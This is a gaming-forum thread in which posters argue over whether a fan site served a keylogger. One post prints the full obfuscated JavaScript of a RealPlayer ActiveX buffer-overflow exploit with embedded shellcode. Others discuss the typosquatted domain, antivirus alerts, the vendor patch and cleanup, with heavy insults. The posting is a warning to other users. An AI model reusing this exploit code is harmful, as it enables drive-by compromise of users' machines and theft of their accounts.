a typo WTF ARE YOU TALKING ABOUT!? it links to a different domain containing the exploit, the "typo" is whats suppose to get you to go to it in the first place.Originally Posted by negativ3zero
a typo WTF ARE YOU TALKING ABOUT!? it links to a different domain containing the exploit, the "typo" is whats suppose to get you to go to it in the first place.Originally Posted by negativ3zero
Originally Posted by negativ3zero
Well the last time he said it was, it did.
I'm not believing Taj, I am believing everything commutated thus far, with all the info we've gotten from others as well.
EDIT: Guy, When did you install RealPlayer?
If I told you jumping off of a cliff onto rocks from 1000ft up would be fatal, you're the type of person that would say no and do it to prove me wrong. Please prove me wrong.. the world would be a better place.Originally Posted by negativ3zero
The page included by the iframe on somepage contains the following JavaScript:
Now will you shut the fuck up please?Code:eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('V v(){W l=p.U.o();3(l.e("r 6")==-1&&l.e("r 7")==-1)g;3(l.e("Q 5.")==-1)g;s="R"+"X.I"+"Y"+"17.1";16{n=15 Z(s)}18(M){g}b=n.D("E");2="";h=d("%C%z%A%u");j(i=0;i<F*G;i++)2+="S";3(b.e("6.0.14.")==-1){3(p.t.o()=="N-L")a=d("%K%H%f");8 3(p.t.o()=="19-13")a=d("%1b%1q%1p%f");8 g}8 3(b=="6.0.14.1s")a=d("%m%11%1n%f");8 3(b=="6.0.14.1r")a=d("%m%11%u%f");8 3(b=="6.0.14.1t")a=d("%w%q%1u%f");8 3(b=="6.0.14.1o")a=d("%w%q%1d%f");8 3(b=="6.0.14.1a")a=d("%1f%11%1g%m");8 g;3(b.e("6.0.10.")!=-1){j(i=0;i<4;i++)2=2+h;2=2+a}8 3(b.e("6.0.11.")!=-1){j(i=0;i<6;i++)2=2+h;2=2+a}8 3(b.e("6.0.12.")!=-1){j(i=0;i<9;i++)2=2+h;2=2+a}8 3(b.e("6.0.14.")!=-1){j(i=0;i<10;i++)2=2+h;2=2+a}y="1h\\\\1i";x="1j";k=2+y+x;1k(k.1m<1c)k+="1e";n.1l("c:\\\\B O\\\\J\\\\P.T",k,"",0,0)}v();',62,93,'||Padding|if|||||else||ret|RealVersion||unescape|indexOf|60|return|JmpOver||for|PayLoad|user|63|Real|toLowerCase|navigator|31|msie|VulObject|userLanguage|04|RealExploit|79|Shell|AdjESP|06|74|Program|75|PlayerProperty|PRODUCTVERSION|32|148|a5||NetMeeting|7f|cn|error|zh|Files|TestSnd|nt|IER||wav|userAgent|function|var|PCtl|ERP|ActiveXObject||||us||new|try|Ctl|catch|en|536|4f|0x8000|09|YuanGe|51|70|LLLL|XXXXXLD|TYXXXXfiAqcYfPAAeiAoHFXZPiAkjbrIPiAgVbaaPiAckwzOPLiAsloUWPiAZczabPiAVqKpAPiARCpDXPQlaaTbaaaLtUAAAACFiaaPoHHmDahivabowabXknENIjdpPPPPpUovdzAsPpPPpPPhktpplXKwpqlzmhKVHPxXKoGfZPtuYNhDtppPpPpNBoYfXfofNPPPpFhGEgBvLFmetOoafXKNxnhBnPpPpPPHCnLRPXKmlVJrpucoOefPDlgptpSUlVqRNVeLGddpcPDGxfuppPPCslPepuPeCEWEpOOUfQphkMLupESOouVpXOoUFplEQuFhkGECLXkwTRnwxpsOEefHKgVRpPSOecClydYdqzMPsleCsMkpokNQpCJMfgtPxLALKpMPcmZTPNKoqcKaOGeNWENXkUNBTPCMmfVXKPLdKxkuNqLPSmMXkPDhKPclejKEneyLsNXEGOOOOOohnTNPnNLlaWiNuKxYHonXZpNgnMhnRgscVQjbOgpFxWdwTgPSjrOBOgGWwgwrNvMvIVOwBWSVoFcffGDrNVcfovMrOFxVeFlwPrOGegpvdfQwDfErNFuGhfUpp|while|Import|length|08|543|a4|71|550|544|552|01'.split('|'),0,{}))
Real Player V. 9 of course the exploit would be there, if you like I can get my hands on any copy of Real Player and install it to prove a pointOriginally Posted by Airenn
But you have no point, lol.
And I asked when you installed it, not which version. Today yea?
god, you remind me of the kind of people at work I have to deal with.
Originally Posted by Airenn
I've had real player 9 for a while over a year atleast
Originally Posted by negativ3zero
Hmm. Well, keep going to some page and let us know how it goes. Might wanna turn off your Firewall, Anti Virus stuff, any Ad Blockers you have and what not and keep refreshing it.
Don't forget to log into POL a lot as well, just to keep the testing complete.
Good lord, a typo.
How could we have been so blind...
No-one is taking this on taj's word. I found out about it around the same time the ffxiah guy posted. I did a "high-tech" deobfuscation of the javascript and found out what it was and what it did. So did a few other people. Taj simply happened to post the main warning thread about it, probably after talking to sonomaa since it got stickied so quickly.
The fact you think that the exploit site is just a "typo" of microsoft's site pretty much says it all. Go and do a whois on the domain. Note that it's registered with a chinese registrar. Note that the domain was only registered a very short time ago. Then find the IP address, and see where the server is hosted. Then come back and tell people that you really think it's a typo.
This is without a doubt the stupidest thing I've ever seen. Almost as daft as thinking "ntldlr" is the windows kernel.
true. too bad others beat me with the detailed informations to prove this guy's stupidity. it's one thing to have no idea of what you talk about, it's something completly different to tell there is no exploit. i'd bann you.Originally Posted by Dammerung
I heard if you have real player uninstalled it makes you immune to the virus as it's a realplayer plugin causing it. At least that's just what i've been reading and hearing not 100% sure on that just thought i'd bring it up.
If this isn't the case for this though real player is unsafe as well i'd suggest uninstalling it since it does have an exploit to it.
Realplayer released a patch for the exploit in its October update, so it's safe to say that having Realplayer installed post October, having the October patch installed, or just not having Realplayer installed is a safe bet.
Unfortunately, Aviator says that he got hacked and he did not have Realplayer installed at all (pg. 3). I don't think a lot of people (of those who were hacked) have confirmed whether or not they even have Realplayer, which makes it hard to conclude that Realplayer is the reason why these hackings are occuring. That being said, it's a good precaution to keep up with your updates (Realplayer AND Windows)
There's a patch for realplayer that fixes the exploit. But if you don't ever view realmedia videos, you shouldn't even have the program installed.
Patch is linked in the removal thread I think, but if not, it's here: http://service.real.com/realplayer/secu ... player/en/
The mentioned exploit on somepage ONLY works on realplayer. If anyone got hacked without realplayer installed, it was a different exploit somewhere else. Or they've shared their account info at some point and someone with the exploit logged into their account on an infected computer.
wasent FFXIAH.com hit by an attack before it was figured out something existed on somepage? could be a combination of both sites.
I'm still staying away from FFXIAH until this whole issue is sorted out. I don't believe that the keylogger is only obtained through somepage, as there seems to be contrasting experiences within this forum. For instance, some people (who were hacked) claim that they have not visited "Site A", but only visited "Site B". While others have only visited "Site B", but have not visited "Site A". It's pretty much confirmed that somepage is infected, but once the iframe on that site was 'popularized' (not the right word), it seems as if the suspicions of FFXI-Atlas and FFXIAH just disappeared. If I recall, weren't there any speculations of keyloggers embedded into the banners on Atlas/AH?
I went to somepage yesterday and checked this out using IE, my AV brought up a warning that "Trojan-Downloader.JS.akd" or something very similar attempted to download to my temp files. It also warned me that the temp file help[1].htm was repeatedly attempting ti install it. I also had multiple inbound TCP alerts from the IP address listed in the other thread.Originally Posted by negativ3zero
I turned off scripting on IE7 and checked again, and nothing happens. This wias with no realplayer installed on my computer. So even if it does nothing without realplayer, it still attempted to do something.
Edit:As for the ads on ffxiah.com, I have a file of hosts that are all blocked. All ffxiah.com ads are in the host file, so I have never had any load to see if they did anything.
http://i174.photobucket.com/albums/w...fefefefefe.jpg
Do I delete THIS? <_< Is this thing normal? Am I surely fucked? Sorry if this is wrong thread but they locked the other one cuz people were bickering I think :[
Delet all of those actually.Originally Posted by Ryogo
How do I make sure they don't come back? Also delete the Default value not set one?